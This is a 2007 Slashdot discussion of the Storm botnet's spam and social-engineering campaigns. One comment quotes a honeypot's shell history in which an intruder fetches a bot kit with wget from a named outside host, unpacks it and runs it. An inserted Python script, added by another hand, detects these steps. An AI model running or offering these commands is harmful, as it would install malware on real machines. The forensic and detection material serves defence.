Security Spam

Storm Botnet Is Behind Two New Attacks

We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.
  • by Jennifer York ( 1021509 ) on Sunday August 26, 2007 @12:59PM (#20363023) Homepage
    I wonder if the huge spike in spam from Tuesday is at all related to this botnet... It was crushing, we had so many users complaining about slow mail service, and it was traced back to a maxed out mail server diligently blocking the spam. The storm passed by Wednesday, but it did show us that we need to upgrade our infrastructure.

    I fscking hate SPAM!

  • Interesting Question (Score:3, Interesting)

    by spikedvodka ( 188722 ) on Sunday August 26, 2007 @01:56PM (#20363511)
    This whole scenario brings up a rather interesting question: Is this a Spam problem, or a virus problem?

    From my understanding there is no viral content in the message, so your virus scanner would have no reason to block the message. A Spam filtering company could well "pass the buck" and say that this is a virus problem: yes, it's going to trigger on some spam rules, but "Where it's a virus problem, why create special rules for it?"

    I can see this type of attack becoming more popular in the future, at least until this question is solved.
  • Re:Ha! (Score:4, Interesting)

    by cp.tar ( 871488 ) <cp.tar.bz2@gmail.com> on Sunday August 26, 2007 @02:13PM (#20363643) Journal

    Well, one point in favour of Linux security is the central software repository for each and every distro.

    Linux users typically will not - even when the popularity of Linux rises - install random cursors, free smilies and whatnot - simply because they'll be used to installing things from the repository.

    And it's quite simple to hammer that into people's heads: the software from the repository is safe. Other software is not.

    There is still nothing similar in the Windows world.

  • by nick13245 ( 681899 ) on Sunday August 26, 2007 @02:16PM (#20363663)
    For instance, here's a recent attack on my honeypot (running Slackware Linux)

    root@zomg:~# cat /home/webmaster/. ./ .bash_history .ssh/ ../ .screenrc .xsession
    root@zomg:~# cat /home/webmaster/.bash_history
    ssh localhost
    w
    cat /etc/hosts
    cat /proc/cpuinfo
    passwd
    cd /var/tmp
    ks
    l
    sl
    ls
    ls- all
    ls -all
    mkdir " "
    cd " "
    clear
    wget imaginez0r.xhost.ro/botme.tar.gz
    tar zxvf botme.tar.gz
    rm -rf botme.tar.gz
    cd .bot/
    PATH=.:$PATH
    bash

    These kinds of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.
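The recovered .bash_history above is exactly the kind of artifact a defender reviews after a honeypot or a compromised shell account is examined. As an added example, not part of the commenter's post, the script below runs a handful of indicator checks over that history: a directory named only with whitespace, an archive fetched from a remote host, the archive unpacked and then deleted, a dot-directory entered, the current directory prepended to PATH, and staging under /var/tmp. The sample input is the commenter's history reproduced verbatim as constructed test data; the indicator names, thresholds and regular expressions are my own choices, not anything from the page.

```python
"""Flag suspicious command sequences in a recovered shell history."""
import re

# Constructed sample: the .bash_history the commenter recovered from the
# Slackware honeypot, reproduced here as test input (line 1 = "ssh localhost").
SAMPLE_HISTORY = """\
ssh localhost
w
cat /etc/hosts
cat /proc/cpuinfo
passwd
cd /var/tmp
ks
l
sl
ls
ls- all
ls -all
mkdir " "
cd " "
clear
wget imaginez0r.xhost.ro/botme.tar.gz
tar zxvf botme.tar.gz
rm -rf botme.tar.gz
cd .bot/
PATH=.:$PATH
bash
"""

# Indicator names and patterns are assumptions of this example, not a standard.
INDICATORS = [
    # A directory whose name is only whitespace hides from a casual `ls`.
    ("whitespace_dirname",   re.compile(r'^(mkdir|cd)\s+"\s*"\s*$')),
    # An archive pulled from a remote host straight onto the box.
    ("remote_archive_fetch", re.compile(r'^(wget|curl)\b.*\.(tar\.gz|tgz|tar|zip)\b')),
    # Current directory put in front of PATH so dropped binaries shadow system ones.
    ("path_prepend_cwd",     re.compile(r'^(export\s+)?PATH=(\.|[^\s]*:\.)(:|$)')),
    # Entering a dot-directory other than . or .. (typical for dropped bot kits).
    ("hidden_dir_entered",   re.compile(r'^cd\s+\.[^./\s]')),
    # Staging in a world-writable scratch directory.
    ("staging_in_tmp",       re.compile(r'^cd\s+/(var/)?tmp(/|\s|$)')),
]

TAR_EXTRACT = re.compile(r'^tar\s+-?\S*x\S*\s+(\S+)')
RM_CMD = re.compile(r'^rm\s+(?:-\S+\s+)*(\S+)')


def analyze(history_text):
    """Return {indicator_name: [history line numbers]} for every indicator that fired."""
    findings = {}
    extracted = {}  # archive filename -> line where it was unpacked
    for lineno, raw in enumerate(history_text.splitlines(), start=1):
        line = raw.strip()
        if not line:
            continue
        for name, pattern in INDICATORS:
            if pattern.search(line):
                findings.setdefault(name, []).append(lineno)
        m = TAR_EXTRACT.match(line)
        if m:
            extracted[m.group(1)] = lineno
        m = RM_CMD.match(line)
        if m and m.group(1) in extracted:
            # Unpack followed by deleting the archive: the payload stays, the evidence goes.
            findings.setdefault("archive_extracted_then_deleted", []).append(lineno)
    return findings


def is_suspicious(findings, min_indicators=3):
    """Heuristic verdict: several independent indicators together, not any single one."""
    return len(findings) >= min_indicators


if __name__ == "__main__":
    result = analyze(SAMPLE_HISTORY)
    for name, lines in sorted(result.items(), key=lambda kv: kv[1][0]):
        print(f"{name:32s} history lines {lines}")
    print("suspicious:", is_suspicious(result))
```

The verdict deliberately requires several indicators to coincide: `cd /var/tmp` on its own is routine, whereas a whitespace-named directory plus a remote archive fetch plus `PATH=.:$PATH` in one session is the drop-and-run pattern the commenter describes.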

  • by MarkRose ( 820682 ) on Sunday August 26, 2007 @03:41PM (#20364401) Homepage
    Interestingly enough, imaginez0r.xhost.ro/botme.tar.gz is still available for download. Looks like the bot is controlled by IRC.
  • Re:Ha! (Score:1, Interesting)

    by Anonymous Coward on Sunday August 26, 2007 @06:43PM (#20366023)
    if you do no work to ensure your OS is as tight as necessary, regardless of what that OS is, you will leave yourself open to being improperly utilized as a system.

    I agree.

    Up until March of this year, my main box was running Windows 2000. I had no infections, no rootkits, nothing. I had no crashes, no BSODs, nothing. I was connected to the net from the second day I built the machine. I ran that machine for five years. Never had to reformat. I used it regularly and with a variety of games and software.

    This was due to me making sure I learned what I was doing when I first decided to install 2k instead of XP. I have books on securing 2K, I turned off many things that did not need to run. I set up the machine pretty nicely, but I still worried. The machine was behind a NAT'd router/firewall, but I still worried. I worried less the day I stopped using IE and started using Firefox, but I still kept vigilant.

    Last year I started installing Linux on my computers. I did not install it until March of this year on my main system. My main system now runs Debian Etch.

    Am I more secure now than I was in February? No. The major difference is that my OS will be kept up to date by the folks at Debian for quite a while, unlike having my system hit "end of life" like MS did with my 2k install. A few minor differences are that I had less tuning to do to make sure my machine was safe, as Etch is a bit more secure than Windows is upon install. Plus a difference that weighs between major and minor is the dedication of the folks creating the Open Source software that the dedicated people working on Debian go over before putting it into the stable repositories.

    Am I complacent? No. Do I still check everything I need to and then some? Yes. Is it worth it to be this vigilant? To me, yes. In addition to this I feel more confident in helping others get through tough problems.

    Windows is insecure at install. Linux is insecure with a careless change or improper permissions set. BSD is its own beast with OpenBSD setting a high mark for security by design.

    If your system is hooked up to a network, or it has any type of media port/drive then it is vulnerable to many things, and if it has none of that, it is still vulnerable to someone who can code directly on the machine.
  • by thogard ( 43403 ) on Sunday August 26, 2007 @10:34PM (#20367481) Homepage
    Consumer protection laws in most countries require Microsoft to recall their software due to damage it's done to innocent 3rd parties yet where in the world did that happen? How about free (or $2) CDs at the local computer shop that will reinstall and patch whatever disks people are likely to have.

    Remember grandma with the hacked computer is running software that is owned by Microsoft. She only licensed it and the owner is still to blame.
  • Re:B.S. (Score:3, Interesting)

    by encoderer ( 1060616 ) on Tuesday August 28, 2007 @03:20PM (#20388463)
    1. I wasn't bashing Linux or OSX or anything else for being insecure. Well, I suppose you could say I was, but if you do, you'd have to acknowledge that I was bashing them all equally. And I certainly gave them credit for being more secure than Windows (the fence analogy, 9 feet vs 6 feet). As desperately as you want me to be, I'm not a windows fanboy or a microsoft apologist. If I were you could dismiss me. I'm a realist. Just that simple.

    2. If you think that UAC is "security by annoyance" then you are not seeing the big picture! As more and more people buy new computers with Vista (which is a predetermined reality. A truly bad OS could hurt MSFT, but not in one product cycle.), anyway, as people buy these computers, and load up their software, you're going to see--I believe--darwin-like natural selection occur. You're going to see Vista-friendly apps "selected" in the wild, making them more popular, which makes them more selected, and a positive feedback loop occurs.

    In a roundabout way--in a way much less destructive than your "break compatibility" suggestion--the "annoyance" of UAC has driven users to more secure software. It's actually an inspired piece of psychology meeting software. They tried to make users care about security. They've promoted things like running only at the PowerUser level or below, running with aggressive IE security settings, etc. But users just don't care. A computer to them is a tool and nothing more and that's that. They want to just do what they want to do. So by creating UAC prompts for bad-actors and non-secure apps, it aligns the users' interest with the interest of us security-minded folks. Not brilliant, but, perhaps, inspired.

    3. Only in the beatnik granola eating linux world (sorry for the stereotype) can anyone take seriously your suggestion for just breaking compatibility with every app that today throws a UAC. It's just not REALISTIC. It's not even utopian. It's an under-thought solution that suggests that there's no other way to solve the problem than to throw away BILLIONS AND BILLIONS of dollars worth of labor.

    Windows is a powerful brand. But again, most users see a PC as a tool and Windows is maybe like the toolbox. A good toolbox can make your life easier. Your suggestion is to make a toolbox that none of the users' existing tools will fit into. But that would cause them to just throw out that toolbox. And they'd keep using the insecure software. What Microsoft is trying to do is point out in an in-your-face way that "the tool you just picked up is not safe to use." Over time, I find it likely that they'll replace their unsafe tools. People deep down WANT to conform, they WANT to meet expectations, they WANT to be responsible. But VERY few would just be cool with throwing out all their tools and never using them and replacing them all at once because their new toolbox said the tools were unsafe and wouldn't let them use them anymore.

    4. My point, for reiteration, is REALISM. We have a real problem. It's not just Microsoft's problem. It's the entire software industry. Very few companies are concerned with making secure software. In all fairness, this wasn't an issue until the advent of the ubiquitous high speed internet connection, which hit critical mass no more than 7 years ago.

    We have to accept that this problem exists. And we have to accept reality:

    - Microsoft is not going away. Windows is not going away. Even if Microsoft never sold another copy of windows it would STILL be on hundreds of millions of computers for YEARS and YEARS to come.

    - Tens--even hundreds--of billions of dollars of software exists (both in-house and commercial) that relies on Administrator privs or otherwise insecure techniques. All of this software, every last byte, has been the product of an investment. The software isn't going anywhere. Y2K shed a light on the true life expectancy of software. As any software developer will tell you -- myself included -- software is expensive. I can't tell you how many times I've given formal and off-the-cu
